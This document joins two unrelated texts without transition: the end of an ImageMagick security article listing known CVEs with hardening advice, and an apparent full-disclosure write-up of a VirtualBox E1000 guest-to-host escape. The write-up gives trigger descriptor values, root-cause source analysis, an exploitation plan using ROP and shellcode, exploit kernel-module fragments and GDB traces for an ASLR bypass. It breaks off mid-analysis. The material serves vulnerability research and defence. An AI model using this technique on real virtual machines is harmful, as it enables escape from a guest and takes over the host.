Here is a top list of widely known ImageMagick vulnerabilities.

ImageTragick. The most famous series of vulnerabilities in ImageMagick. It includes RCESSRFLocal File Read/Move/Delete in svg and mvg files. It was discovered in April 2016 by stewie and Nikolay Ermishkin.

  • CVE-2016–3714 — RCE
  • CVE-2016–3718 — SSRF
  • CVE-2016–3715 — File deletion
  • CVE-2016–3716 — File moving
  • CVE-2016–3717 — Local file read

Patch was available in 6.9.3–9 released 2016–04–30 ImageMagick version. This vulnerability was quite popular with bughunters:

CVE-2017–15277 a.k.a. gifoeb. Discovered by Emil Lerner in 2017 July. This vulnerability is a memory leakage in GIF images processing. ImageMagick leaves the palette uninitialized if neither global nor local palette is present, and a memory leak occurs exactly through the palette. This rather limited the length of the leaked data. This vulnerability was also popular with bughunters.

GhostScript Type Confusion RCE (CVE-2017–8291). Was discovered in May 2017. It’s not an ImageMagick vulnerability, but it affects it as ImageMagick uses ghostscript to handle certain types of images with PostScript, i.e. EPS, PDF files.

CVE-2018–16509, another RCE in GhostScript, was published in August 2018. Also affects ImageMagick as it is in GhostScript like the previous bug.

How many other vulnerabilities that carry serious security problems remain unknown? We do not know. We have specially prepared a small history of ImageMagick security infographic.

History of ImageMagick security

Part 3 — How can we use ImageMagick in a secure way?

Stop using ImageMagick? Maybe, but..

We do not tell you to stop using the ImageMagick. We advise you to do this in a safe way to reduce information security risks.

First, as you may have noticed ImageMagick has a lot of vulnerabilities constantly appearing and therefore it is also updated frequently. If you use ImageMagick then watch for new versions and make sure the latest version is installed at all times. Notice that ImageMagick is not frequently updated in official repositories so it may contain old vulnerable versions. It is best to install stable ImageMagick version from source code.

But as you can see from our example, fixing old vulnerabilities brings new vulnerabilities 🙂

Therefore, updating ImageMagick may not save you.

Best practice for ImageMagick is to run it in an isolated environment, like Docker. Set minimum required rights for the service that uses ImageMagick. Put it in an isolated network segment with minimal network rights. And use this isolated environment ONLY for a specific task of processing custom user images using ImageMagick.

Also ImageMagick have configured security policy.

Here you can find a detailed guide on the security of ImageMagick from developers.

 

Virtualbox e1000 0day

Why

I like VirtualBox and it has nothing to do with why I publish a 0day vulnerability. The reason is my disagreement with contemporary state of infosec, especially of security research and bug bounty:

  1. Wait half a year until a vulnerability is patched is considered fine.
  2. In the bug bounty field these are considered fine:
    1. Wait more than month until a submitted vulnerability is verified and a decision to buy or not to buy is made.
    2. Change the decision on the fly. Today you figured out the bug bounty program will buy bugs in a software, week later you come with bugs and exploits and receive «not interested».
    3. Have not a precise list of software a bug bounty is interested to buy bugs in. Handy for bug bounties, awkward for researchers.
    4. Have not precise lower and upper bounds of vulnerability prices. There are many things influencing a price but researchers need to know what is worth to work on and what is not.
  3. Delusion of grandeur and marketing bullshit: naming vulnerabilities and creating websites for them; making a thousand conferences in a year; exaggerating importance of own job as a security researcher; considering yourself «a world saviour». Come down, Your Highness.

I’m exhausted of the first two, therefore my move is full disclosure. Infosec, please move forward.

General Information

Vulnerable software: VirtualBox 5.2.20 and prior versions.

Host OS: any, the bug is in a shared code base.

Guest OS: any.

VM configuration: default (the only requirement is that a network card is Intel PRO/1000 MT Desktop (82540EM) and a mode is NAT).

How to protect yourself

Until the patched VirtualBox build is out you can change the network card of your virtual machines to PCnet (either of two) or to Paravirtualized Network. If you can’t, change the mode from NAT to another one. The former way is more secure.

Introduction

A default VirtualBox virtual network device is Intel PRO/1000 MT Desktop (82540EM) and the default network mode is NAT. We will refer to it E1000.

The E1000 has a vulnerability allowing an attacker with root/administrator privileges in a guest to escape to a host ring3. Then the attacker can use existing techniques to escalate privileges to ring 0 via /dev/vboxdrv.

Vulnerability Details

E1000 101

To send network packets a guest does what a common PC does: it configures a network card and supplies network packets to it. Packets are of data link layer frames and of other, more high level headers. Packets supplied to the adaptor are wrapped in Tx descriptors (Tx means transmit). The Tx descriptor is data structure described in the 82540EM datasheet (317453006EN.PDF, Revision 4.0). It stores such metainformation as packet size, VLAN tag, TCP/IP segmentation enabled flags and so on.

The 82540EM datasheet provides for three Tx descriptor types: legacy, context, data. Legacy is deprecated I believe. The other two are used together. The only thing we care of is that context descriptors set the maximum packet size and switch TCP/IP segmentation, and that data descriptors hold physical addresses of network packets and their sizes. The data descriptor’s packet size must be lesser than the context descriptor’s maximum packet size. Usually context descriptors are supplied to the network card before data descriptors.

To supply Tx descriptors to the network card a guess writes them to Tx Ring. This is a ring buffer residing in physical memory at a predefined address. When all descriptors are written down to Tx Ring the guest updates E1000 MMIO TDT register (Transmit Descriptor Tail) to tell the host there are new descriptors to handle.

Input

Consider the following array of Tx descriptors:

[context_1, data_2, data_3, context_4, data_5]

Let’s assign their structure fields as follows (field names are hypothetical to be human readable but directly map to the 82540EM specification):

context_1.header_length = 0
context_1.maximum_segment_size = 0x3010
context_1.tcp_segmentation_enabled = true

data_2.data_length = 0x10
data_2.end_of_packet = false
data_2.tcp_segmentation_enabled = true

data_3.data_length = 0
data_3.end_of_packet = true
data_3.tcp_segmentation_enabled = true

context_4.header_length = 0
context_4.maximum_segment_size = 0xF
context_4.tcp_segmentation_enabled = true

data_5.data_length = 0x4188
data_5.end_of_packet = true
data_5.tcp_segmentation_enabled = true

We will learn why they should be like that in our step-by-step analysis.

Root Cause Analysis

[context_1, data_2, data_3] Processing

Let’s assume the descriptors above are written to the Tx Ring in the specified order and TDT register is updated by the guest. Now the host will execute e1kXmitPending function in src/VBox/Devices/Network/DevE1000.cpp file (most of comments are and will be stripped for the sake of readability):

static int e1kXmitPending(PE1KSTATE pThis, bool fOnWorkerThread)
{
...
        while (!pThis->fLocked && e1kTxDLazyLoad(pThis))
        {
            while (e1kLocateTxPacket(pThis))
            {
                fIncomplete = false;
                rc = e1kXmitAllocBuf(pThis, pThis->fGSO);
                if (RT_FAILURE(rc))
                    goto out;
                rc = e1kXmitPacket(pThis, fOnWorkerThread);
                if (RT_FAILURE(rc))
                    goto out;
            }

e1kTxDLazyLoad will read all the 5 Tx descriptors from the Tx Ring. Then e1kLocateTxPacket is called for the first time. This function iterates through all the descriptors to set up an initial state but does not actually handle them. In our case the first call to e1kLocateTxPacket will handle context_1, data_2, and data_3 descriptors. The two remaining descriptors, context_4 and data_5, will be handled at the second iteration of the while loop (we will cover the second iteration in the next section). This two-part array division is crucial to trigger the vulnerability so let’s figure out why.

e1kLocateTxPacket looks like this:

static bool e1kLocateTxPacket(PE1KSTATE pThis)
{
...
    for (int i = pThis->iTxDCurrent; i < pThis->nTxDFetched; ++i)
    {
        E1KTXDESC *pDesc = &pThis->aTxDescriptors[i];
        switch (e1kGetDescType(pDesc))
        {
            case E1K_DTYP_CONTEXT:
                e1kUpdateTxContext(pThis, pDesc);
                continue;
            case E1K_DTYP_LEGACY:
                ...
                break;
            case E1K_DTYP_DATA:
                if (!pDesc->data.u64BufAddr || !pDesc->data.cmd.u20DTALEN)
                    break;
                ...
                break;
            default:
                AssertMsgFailed(("Impossible descriptor type!"));
        }

The first descriptor (context_1) is of E1K_DTYP_CONTEXT so e1kUpdateTxContext function is called. This function updates a TCP Segmentation Context if TCP Segmentation is enabled for the descriptor. It is true for context_1 so the TCP Segmentation Context will be updated. (What the TCP Segmentation Context Update actually is, is not important, and we will use this just to refer the code below).

The second descriptor (data_2) is of E1K_DTYP_DATA so several actions unnecessary for the discussion will be performed.

The third descriptor (data_3) is also of E1K_DTYP_DATA but since data_3.data_length == 0 no action is performed.

At the moment the three descriptors are initially processed and the two remain. Now the thing: after the switch statement there is a check wheter a descriptor’s end_of_packet field was set. It is true for data_3 descriptor (data_3.end_of_packet == true). The code does some actions and returns from the function:

        if (pDesc->legacy.cmd.fEOP)
        {
            ...
            return true;
        }

If data_3.end_of_packet would been false then the remaining context_4 and data_5 descriptors would be processed, and the vulnerability would been bypassed. Below you’ll see why that return from the function leads to the bug.

At the end of e1kLocateTxPacket function we have the following descriptors ready to unwrap network packets from and to send to a network: context_1, data_2, data_3. Then the inner loop of e1kXmitPending calls e1kXmitPacket. This functions iterates through all the descriptors (5 in our case) to actually process them:

static int e1kXmitPacket(PE1KSTATE pThis, bool fOnWorkerThread)
{
...
    while (pThis->iTxDCurrent < pThis->nTxDFetched)
    {
        E1KTXDESC *pDesc = &pThis->aTxDescriptors[pThis->iTxDCurrent];
        ...
        rc = e1kXmitDesc(pThis, pDesc, e1kDescAddr(TDBAH, TDBAL, TDH), fOnWorkerThread);
        ...
        if (e1kGetDescType(pDesc) != E1K_DTYP_CONTEXT && pDesc->legacy.cmd.fEOP)
            break;
    }

For each descriptor e1kXmitDesc function is called:

static int e1kXmitDesc(PE1KSTATE pThis, E1KTXDESC *pDesc, RTGCPHYS addr,
                       bool fOnWorkerThread)
{
...
    switch (e1kGetDescType(pDesc))
    {
        case E1K_DTYP_CONTEXT:
            ...
            break;
        case E1K_DTYP_DATA:
        {
            ...
            if (pDesc->data.cmd.u20DTALEN == 0 || pDesc->data.u64BufAddr == 0)
            {
                E1kLog2(("% Empty data descriptor, skipped.\n", pThis->szPrf));
            }
            else
            {
                if (e1kXmitIsGsoBuf(pThis->CTX_SUFF(pTxSg)))
                {
                    ...
                }
                else if (!pDesc->data.cmd.fTSE)
                {
                    ...
                }
                else
                {
                    STAM_COUNTER_INC(&pThis->StatTxPathFallback);
                    rc = e1kFallbackAddToFrame(pThis, pDesc, fOnWorkerThread);
                }
            }
            ...

The first descriptor passed to e1kXmitDesc is context_1. The function does nothing with context descriptors.

The second descriptor passed to e1kXmitDesc is data_2. Since all of our data descriptors have tcp_segmentation_enable == true (pDesc->data.cmd.fTSE above) we call e1kFallbackAddToFrame where there will be an integer underflow while data_5 is processed.

static int e1kFallbackAddToFrame(PE1KSTATE pThis, E1KTXDESC *pDesc, bool fOnWorkerThread)
{
    ...
    uint16_t u16MaxPktLen = pThis->contextTSE.dw3.u8HDRLEN + pThis->contextTSE.dw3.u16MSS;

    /*
     * Carve out segments.
     */
    int rc = VINF_SUCCESS;
    do
    {
        /* Calculate how many bytes we have left in this TCP segment */
        uint32_t cb = u16MaxPktLen - pThis->u16TxPktLen;
        if (cb > pDesc->data.cmd.u20DTALEN)
        {
            /* This descriptor fits completely into current segment */
            cb = pDesc->data.cmd.u20DTALEN;
            rc = e1kFallbackAddSegment(pThis, pDesc->data.u64BufAddr, cb, pDesc->data.cmd.fEOP /*fSend*/, fOnWorkerThread);
        }
        else
        {
            ...
        }

        pDesc->data.u64BufAddr    += cb;
        pDesc->data.cmd.u20DTALEN -= cb;
    } while (pDesc->data.cmd.u20DTALEN > 0 && RT_SUCCESS(rc));

    if (pDesc->data.cmd.fEOP)
    {
        ...
        pThis->u16TxPktLen = 0;
        ...
    }

    return VINF_SUCCESS; /// @todo consider rc;
}

The most important variables here are u16MaxPktLen, pThis->u16TxPktLen, and pDesc->data.cmd.u20DTALEN.

Let’s draw a table where values of these variables are specified before and after execution of e1kFallbackAddToFrame function for the two data descriptors.

Tx Descriptor Before/After u16MaxPktLen pThis->u16TxPktLen pDesc->data.cmd.u20DTALEN
data_2 Before 0x3010 0 0x10
After 0x3010 0x10 0
data_3 Before 0x3010 0x10 0
After 0x3010 0x10 0

You just need to note that when data_3 is processed pThis->u16TxPktLen equals to 0x10.

Next is the most important part. Please look again at the end of the snippet of e1kXmitPacket:

        if (e1kGetDescType(pDesc) != E1K_DTYP_CONTEXT && pDesc->legacy.cmd.fEOP)
            break;

Since data_3 type != E1K_DTYP_CONTEXT and data_3.end_of_packet == true, we break from the loop despite the fact that there are context_4 and data_5 to be processed. Why is it important? The key to understand the vulnerability is to understand that all context descriptors are processed before data descriptors. Context descriptors are processed during the TCP Segmentation Context Update in e1kLocateTxPacket. Data descriptors are processed later in the loop inside e1kXmitPacket function. The developer intention was to forbid changing u16MaxPktLen after some data was processed to prevent integer underflows in the code:

uint32_t cb = u16MaxPktLen - pThis->u16TxPktLen;

But we are able to bypass this protection: recall that in e1kLocateTxPacket we forced the function to return because of data_3.end_of_packet == true. And because of that we have two descriptors (context_4 and data_5) left to be processed despite the fact that pThis->u16TxPktLen is 0x10, not 0. So there is a possibility to change u16MaxPktLen using context_4.maximum_segment_size to make the integer underflow.

[context_4, data_5] Processing

Now when the first three descriptors were processed we again arrive to the inner loop of e1kXmitPending:

            while (e1kLocateTxPacket(pThis))
            {
                fIncomplete = false;
                rc = e1kXmitAllocBuf(pThis, pThis->fGSO);
                if (RT_FAILURE(rc))
                    goto out;
                rc = e1kXmitPacket(pThis, fOnWorkerThread);
                if (RT_FAILURE(rc))
                    goto out;
            }

Here we call e1kLocateTxPacket do the initial processing of context_4 and data_5 descriptors. It has been said that we can set context_4.maximum_segment_size to a size lesser than the size of data already read i.e. lesser than 0x10. Recall our input Tx descriptors:

context_4.header_length = 0
context_4.maximum_segment_size = 0xF
context_4.tcp_segmentation_enabled = true

data_5.data_length = 0x4188
data_5.end_of_packet = true
data_5.tcp_segmentation_enabled = true

As a result of the call to e1kLocateTxPacket we have the maximum segment size equals to 0xF, whereas the size of data already read is 0x10.

Finally, when processing data_5 we again arrive to e1kFallbackAddToFrame and have the following variable values:

Tx Descriptor Before/After u16MaxPktLen pThis->u16TxPktLen pDesc->data.cmd.u20DTALEN
data_5 Before 0xF 0x10 0x4188
After

And therefore we have an integer underflow:

uint32_t cb = u16MaxPktLen - pThis->u16TxPktLen;
=>
uint32_t cb = 0xF - 0x10 = 0xFFFFFFFF;

This makes the following check to be true since 0xFFFFFFFF > 0x4188:

        if (cb > pDesc->data.cmd.u20DTALEN)
        {
            cb = pDesc->data.cmd.u20DTALEN;
            rc = e1kFallbackAddSegment(pThis, pDesc->data.u64BufAddr, cb, pDesc->data.cmd.fEOP /*fSend*/, fOnWorkerThread);
        }

e1kFallbackAddSegment function will be called with size 0x4188. Without the vulnerability it’s impossible to call e1kFallbackAddSegment with a size greater than 0x4000 because, during the TCP Segmentation Context Update in e1kUpdateTxContext, there is a check that the maximum segment size is less or equal to 0x4000:

DECLINLINE(void) e1kUpdateTxContext(PE1KSTATE pThis, E1KTXDESC *pDesc)
{
...
        uint32_t cbMaxSegmentSize = pThis->contextTSE.dw3.u16MSS + pThis->contextTSE.dw3.u8HDRLEN + 4; /*VTAG*/
        if (RT_UNLIKELY(cbMaxSegmentSize > E1K_MAX_TX_PKT_SIZE))
        {
            pThis->contextTSE.dw3.u16MSS = E1K_MAX_TX_PKT_SIZE - pThis->contextTSE.dw3.u8HDRLEN - 4; /*VTAG*/
            ...
        }

Buffer Overflow

We have called e1kFallbackAddSegment with size 0x4188. How this can be abused? There are at least two possibilities I found. Firstly, data will be read from the guest into a heap buffer:

static int e1kFallbackAddSegment(PE1KSTATE pThis, RTGCPHYS PhysAddr, uint16_t u16Len, bool fSend, bool fOnWorkerThread)
{
    ...
    PDMDevHlpPhysRead(pThis->CTX_SUFF(pDevIns), PhysAddr,
                      pThis->aTxPacketFallback + pThis->u16TxPktLen, u16Len);

Here pThis->aTxPacketFallback is the buffer of size 0x3FA0 and u16Len is 0x4188 — an obvious overflow that can lead, for example, to a function pointers overwrite.

Secondly, if we dig deeper we found that e1kFallbackAddSegment calls e1kTransmitFrame that can, with a certain configuration of E1000 registers, call e1kHandleRxPacket function. This function allocates a stack buffer of size 0x4000 and then copies data of a specified length (0x4188 in our case) to the buffer without any check:

static int e1kHandleRxPacket(PE1KSTATE pThis, const void *pvBuf, size_t cb, E1KRXDST status)
{
#if defined(IN_RING3)
    uint8_t   rxPacket[E1K_MAX_RX_PKT_SIZE];
    ...
    if (status.fVP)
    {
        ...
    }
    else
        memcpy(rxPacket, pvBuf, cb);

As you see, we turned an integer underflow to a classical stack buffer overflow. The two overflows above — heap and stack ones — are used in the exploit.

Exploit

The exploit is Linux kernel module (LKM) to load in a guest OS. The Windows case would require a driver differing from the LKM just by an initialization wrapper and kernel API calls.

Elevated privileges are required to load a driver in both OSs. It’s common and isn’t considered an insurmountable obstacle. Look at Pwn2Own contest where researcher use exploit chains: a browser opened a malicious website in the guest OS is exploited, a browser sandbox escape is made to gain full ring 3 access, an operating system vulnerability is exploited to pave a way to ring 0 from where there are anything you need to attack a hypervisor from the guest OS. The most powerful hypervisor vulnerabilities are for sure those that can be exploited from guest ring 3. There in VirtualBox is also such code that is reachable without guest root privileges, and it’s mostly not audited yet.

The exploit is 100% reliable. It means it either works always or never because of mismatched binaries or other, more subtle reasons I didn’t account. It works at least on Ubuntu 16.04 and 18.04 x86_64 guests with default configuration.

Exploitation Algorithm

  1. An attacker unloads e1000.ko loaded by default in Linux guests and loads the exploit’s LKM.
  2. The LKM initializes E1000 according to the datasheet. Only the transmit half is initialized since there is no need for the receive half.
  3. Step 1: information leak.
    1. The LKM disables E1000 loopback mode to make stack buffer overflow code unreachable.
    2. The LKM uses the integer underflow vulnerability to make the heap buffer overflow.
    3. The heap buffer overflow allows for use E1000 EEPROM to write two any bytes relative to a heap buffer in 128 KB range. Hence the attacker gains a write primitive.
    4. The LKM uses the write primitive 8 times to write bytes to ACPI (Advanced Configuration and Power Interface) data structure on heap. Bytes are written to an index variable of a heap buffer from which a single byte will be read. Since the buffer size is lesser than maximum index number (255) the attacker can read past the buffer, hence he/she gains a read primitive.
    5. The LKM uses the read primitive 8 times to access ACPI and obtain 8 bytes from the heap. Those bytes are pointer of VBoxDD.so shared library.
    6. The LKM subtracts RVA from the pointer to obtain VBoxDD.so image base.
  4. Step 2: stack buffer overflow.
    1. The LKM enabled E1000 loopback mode to make stack buffer overflow code reachable.
    2. The LKM uses the integer underflow vulnerability to make the heap buffer overflow and the stack buffer overflow. Saved return address (RIP/EIP) is overwritten. The attacker gains control.
    3. ROP chain is executed to execute a shellcode loader.
  5. Step 3: shellcode.
    1. The shellcode loader copies a shellcode from the stack next to itself. The shellcode is executed.
    2. The shellcode does fork and execve syscalls to spawn an arbitrary process on the host side.
    3. The parent process does process continuation.
  6. The attacker unloads the LKM and loads e1000.ko back to allow the guest to use network.

Initialization

The LKM maps physical memory regarding to E1000 MMIO. Physical address and size are predefined by the hypervisor.

void* map_mmio(void) {
    off_t pa = 0xF0000000;
    size_t len = 0x20000;

    void* va = ioremap(pa, len);
    if (!va) {
        printk(KERN_INFO PFX"ioremap failed to map MMIO\n");
        return NULL;
    }

    return va;
}

Then E1000 general purpose registers are configured, Tx Ring memory is allocated, transmit registers are configured.

void e1000_init(void* mmio) {
    // Configure general purpose registers

    configure_CTRL(mmio);

    // Configure TX registers

    g_tx_ring = kmalloc(MAX_TX_RING_SIZE, GFP_KERNEL);
    if (!g_tx_ring) {
        printk(KERN_INFO PFX"Failed to allocate TX Ring\n");
        return;
    }

    configure_TDBAL(mmio);
    configure_TDBAH(mmio);
    configure_TDLEN(mmio);
    configure_TCTL(mmio);
}

ASLR Bypass

Write primitive

From the beginning of exploit development I decided not to use primitives found in services disabled by default. This means in the first place the Chromium service (not a browser) that provides for 3D acceleration where more than 40 vulnerabilities are found by researchers in the last year.

The problem was to find an information leak in default VirtualBox subsystems. The obvious thought was that if the integer underflow allows to overflow the heap buffer then we control anything past the buffer. We’ll see that not a single additional vulnerability was required: the integer underflow appeared to be quite powerful to derive read, write, and information leak primitives from it, not saying of the stack buffer overflow.

Let’s examine what exactly is overflowed on the heap.

/**
 * Device state structure.
 */
struct E1kState_st
{
...
    uint8_t     aTxPacketFallback[E1K_MAX_TX_PKT_SIZE];
...
    E1kEEPROM   eeprom;
...
}

Here aTxPacketFallback is a buffer of size 0x3FA0 which will be overflowed with bytes copied from a data descriptor. Searching for interesting fields after the buffer I came to E1kEEPROM structure which contains another structure with the following fields (src/VBox/Devices/Network/DevE1000.cpp):

/**
 * 93C46-compatible EEPROM device emulation.
 */
struct EEPROM93C46
{
...
    bool m_fWriteEnabled;
    uint8_t Alignment1;
    uint16_t m_u16Word;
    uint16_t m_u16Mask;
    uint16_t m_u16Addr;
    uint32_t m_u32InternalWires;
...
}

How can we abuse them? E1000 implements EEPROM, secondary adaptor memory. The guest OS can access it via E1000 MMIO registers. EEPROM is implemented as a finite automaton with several states and does four actions. We are interested only in «write to memory». This is how it looks (src/VBox/Devices/Network/DevEEPROM.cpp):

EEPROM93C46::State EEPROM93C46::opWrite()
{
    storeWord(m_u16Addr, m_u16Word);
    return WAITING_CS_FALL;
}

void EEPROM93C46::storeWord(uint32_t u32Addr, uint16_t u16Value)
{
    if (m_fWriteEnabled) {
        E1kLog(("EEPROM: Stored word %04x at %08x\n", u16Value, u32Addr));
        m_au16Data[u32Addr] = u16Value;
    }
    m_u16Mask = DATA_MSB;
}

Here m_u16Addr, m_u16Word, and m_fWriteEnabled are fields of EEPROM93C46 structure we control. We can malform them in a way that

m_au16Data[u32Addr] = u16Value;

statement will write two bytes at arbitrary 16-bit offset from m_au16Data that also residing in the structure. We have found a write primitive.

Read primitive

The next problem was to find data structures on the heap to write arbitrary data into, pursuing the main goal to leak a shared library pointer to get its image base. Hopefully, it was need not to do an unstable heap spray because virtual devices’ main data structures appeared to be allocated from an internal hypervisor heap in the way that the distance between them is always constant, despite that their virtual addresses, of course, are randomized by ASLR.

When a virtual machine is launched the PDM (Pluggable Device and Driver Manager) subsystem allocates PDMDEVINS objects in the hypervisor heap.

int pdmR3DevInit(PVM pVM)
{
...
        PPDMDEVINS pDevIns;
        if (paDevs[i].pDev->pReg->fFlags & (PDM_DEVREG_FLAGS_RC | PDM_DEVREG_FLAGS_R0))
            rc = MMR3HyperAllocOnceNoRel(pVM, cb, 0, MM_TAG_PDM_DEVICE, (void **)&pDevIns);
        else
            rc = MMR3HeapAllocZEx(pVM, MM_TAG_PDM_DEVICE, cb, (void **)&pDevIns);
...

I traced that code under GDB using a script and got these results:

[trace-device-constructors] Constructing a device #0x0:
[trace-device-constructors] Name: "pcarch", '\000' <repeats 25 times>
[trace-device-constructors] Description: 0x7fc44d6f125a "PC Architecture Device"
[trace-device-constructors] Constructor: {int (PPDMDEVINS, int, PCFGMNODE)} 0x7fc44d57517b <pcarchConstruct(PPDMDEVINS, int, PCFGMNODE)>
[trace-device-constructors] Instance: 0x7fc45486c1b0
[trace-device-constructors] Data size: 0x8

[trace-device-constructors] Constructing a device #0x1:
[trace-device-constructors] Name: "pcbios", '\000' <repeats 25 times>
[trace-device-constructors] Description: 0x7fc44d6ef37b "PC BIOS Device"
[trace-device-constructors] Constructor: {int (PPDMDEVINS, int, PCFGMNODE)} 0x7fc44d56bd3b <pcbiosConstruct(PPDMDEVINS, int, PCFGMNODE)>
[trace-device-constructors] Instance: 0x7fc45486c720
[trace-device-constructors] Data size: 0x11e8

...

[trace-device-constructors] Constructing a device #0xe:
[trace-device-constructors] Name: "e1000", '\000' <repeats 26 times>
[trace-device-constructors] Description: 0x7fc44d70c6d0 "Intel PRO/1000 MT Desktop Ethernet.\n"
[trace-device-constructors] Constructor: {int (PPDMDEVINS, int, PCFGMNODE)} 0x7fc44d622969 <e1kR3Construct(PPDMDEVINS, int, PCFGMNODE)>
[trace-device-constructors] Instance: 0x7fc470083400
[trace-device-constructors] Data size: 0x53a0

[trace-device-constructors] Constructing a device #0xf:
[trace-device-constructors] Name: "ichac97", '\000' <repeats 24 times>
[trace-device-constructors] Description: 0x7fc44d716ac0 "ICH AC'97 Audio Controller"
[trace-device-constructors] Constructor: {int (PPDMDEVINS, int, PCFGMNODE)} 0x7fc44d66a90f <ichac97R3Construct(PPDMDEVINS, int, PCFGMNODE)>
[trace-device-constructors] Instance: 0x7fc470088b00
[trace-device-constructors] Data size: 0x1848

[trace-device-constructors] Constructing a device #0x10:
[trace-device-constructors] Name: "usb-ohci", '\000' <repeats 23 times>
[trace-device-constructors] Description: 0x7fc44d707025 "OHCI USB controller.\n"
[trace-device-constructors] Constructor: {int (PPDMDEVINS, int, PCFGMNODE)} 0x7fc44d5ea841 <ohciR3Construct(PPDMDEVINS, int, PCFGMNODE)>
[trace-device-constructors] Instance: 0x7fc47008a4e0
[trace-device-constructors] Data size: 0x1728

[trace-device-constructors] Constructing a device #0x11:
[trace-device-constructors] Name: "acpi", '\000' <repeats 27 times>
[trace-device-constructors] Description: 0x7fc44d6eced8 "Advanced Configuration and Power Interface"
[trace-device-constructors] Constructor: {int (PPDMDEVINS, int, PCFGMNODE)} 0x7fc44d563431 <acpiR3Construct(PPDMDEVINS, int, PCFGMNODE)>
[trace-device-constructors] Instance: 0x7fc47008be70
[trace-device-constructors] Data size: 0x1570

[trace-device-constructors] Constructing a device #0x12:
[trace-device-constructors] Name: "GIMDev", '\000' <repeats 25 times>
[trace-device-constructors] Description: 0x7fc44d6f17fa "VirtualBox GIM Device"
[trace-device-constructors] Constructor: {int (PPDMDEVINS, int, PCFGMNODE)} 0x7fc44d575cde <gimdevR3Construct(PPDMDEVINS, int, PCFGMNODE)>
[trace-device-constructors] Instance: 0x7fc47008dba0
[trace-device-constructors] Data size: 0x90

[trace-device-constructors] Instances:
[trace-device-constructors] #0x0 Address: 0x7fc45486c1b0
[trace-device-constructors] #0x1 Address 0x7fc45486c720 differs from previous by 0x570
[trace-device-constructors] #0x2 Address 0x7fc4700685f0 differs from previous by 0x1b7fbed0
[trace-device-constructors] #0x3 Address 0x7fc4700696d0 differs from previous by 0x10e0
[trace-device-constructors] #0x4 Address 0x7fc47006a0d0 differs from previous by 0xa00
[trace-device-constructors] #0x5 Address 0x7fc47006a450 differs from previous by 0x380
[trace-device-constructors] #0x6 Address 0x7fc47006a920 differs from previous by 0x4d0
[trace-device-constructors] #0x7 Address 0x7fc47006ad50 differs from previous by 0x430
[trace-device-constructors] #0x8 Address 0x7fc47006b240 differs from previous by 0x4f0
[trace-device-constructors] #0x9 Address 0x7fc4548ec9a0 differs from previous by 0x-1b77e8a0
[trace-device-constructors] #0xa Address 0x7fc470075f90 differs from previous by 0x1b7895f0
[trace-device-constructors] #0xb Address 0x7fc488022000 differs from previous by 0x17fac070
[trace-device-constructors] #0xc Address 0x7fc47007cf80 differs from previous by 0x-17fa5080
[trace-device-constructors] #0xd Address 0x7fc4700820f0 differs from previous by 0x5170
[trace-device-constructors] #0xe Address 0x7fc470083400 differs from previous by 0x1310
[trace-device-constructors] #0xf Address 0x7fc470088b00 differs from previous by 0x5700
[trace-device-constructors] #0x10 Address 0x7fc47008a4e0 differs from previous by 0x19e0
[trace-device-constructors] #0x11 Address 0x7fc47008be70 differs from previous by 0x1990
[trace-device-constructors] #0x12 Address 0x7fc47008dba0 differs from previous by 0x1d30

Note the E1000 device at #0xE position. It can be seen in the second list that the following device is at 0x5700 offset from E1000, the next is at 0x19E0 and so on. We already said that these distances are always the same, and it’s our exploitation opportunity.

Devices following E1000 are ICH IC’97, OHCI, ACPI, VirtualBox GIM. Learning their data structures I figured the way to use the write primitive.

On virtual machine boot up the ACPI device is created (src/VBox/Devices/PC/DevACPI.cpp):

typedef struct ACPIState
{
...
    uint8_t             au8SMBusBlkDat[32];
    uint8_t             u8SMBusBlkIdx;
    uint32_t            uPmTimeOld;
    uint32_t            uPmTimeA;
    uint32_t            uPmTimeB;
    uint32_t            Alignment5;
} ACPIState;

An ACPI port input/output handler is registered for 0x4100-0x410F range. In the case of 0x4107 port we have:

PDMBOTHCBDECL(int) acpiR3SMBusRead(PPDMDEVINS pDevIns, void *pvUser, RTIOPORT Port, uint32_t *pu32, unsigned cb)
{
    RT_NOREF1(pDevIns);
    ACPIState *pThis = (ACPIState *)pvUser;
...
    switch (off)
    {
...
        case SMBBLKDAT_OFF:
            *pu32 = pThis->au8SMBusBlkDat[pThis->u8SMBusBlkIdx];
            pThis->u8SMBusBlkIdx++;
            pThis->u8SMBusBlkIdx &= sizeof(pThis->au8SMBusBlkDat) - 1;
            break;
...

When the guest OS executes INB(0x4107) instruction to read one byte from the port, the handler takes one bytes from au8SMBusBlkDat[32] array at u8SMBusBlkIdx index and returns it to the guest. And this is how to apply the write primitive: since the distance between virtual device heap blocks are constant, so is the distance from EEPROM93C46.m_au16Data array to ACPIState.u8SMBusBlkIdx. Writing two bytes to ACPIState.u8SMBusBlkIdx we can read arbitrary data in the range of 255 bytes from ACPIState.au8SMBusBlkDat.

There is an obstacle. Having a look to ACPIState structure it can be seen that the array is placed at the end of the structure. The remaining fields are useless to leak. So let’s look what can be found after the structure:

gef➤  x/16gx (ACPIState*)(0x7fc47008be70+0x100)+1
0x7fc47008d4e0:	0xffffe98100000090	0xfffd9b2000000000
0x7fc47008d4f0:	0x00007fc470067a00	0x00007fc470067a00
0x7fc47008d500:	0x00000000a0028a00	0x00000000000e0000
0x7fc47008d510:	0x00000000000e0fff	0x0000000000001000
0x7fc47008d520:	0x000000ff00000002	0x0000100000000000
0x7fc47008d530:	0x00007fc47008c358	0x00007fc44d6ecdc6
0x7fc47008d540:	0x0031000035944000	0x00000000000002b8
0x7fc47008d550:	0x00280001d3878000	0x0000000000000000
gef➤  x/s 0x00007fc44d6ecdc6
0x7fc44d6ecdc6:	"ACPI RSDP"
gef➤  vmmap VBoxDD.so
Start                           End                             Offset                          Perm Path
0x00007fc44d4f3000 0x00007fc44d768000 0x0000000000000000 r-x /home/user/src/VirtualBox-5.2.20/out/linux.amd64/release/bin/VBoxDD.so
0x00007fc44d768000 0x00007fc44d968000 0x0000000000275000 --- /home/user/src/VirtualBox-5.2.20/out/linux.amd64/release/bin/VBoxDD.so
0x00007fc44d968000 0x00007fc44d977000 0x0000000000275000 r-- /home/user/src/VirtualBox-5.2.20/out/linux.amd64/release/bin/VBoxDD.so
0x00007fc44d977000 0x00007fc44d980000 0x0000000000284000 rw- /home/user/src/VirtualBox-5.2.20/out/linux.amd64/release/bin/VBoxDD.so
gef➤  p 0x00007fc44d6ecdc6 - 0x00007fc44d4f3000
$2 = 0x1f9dc6

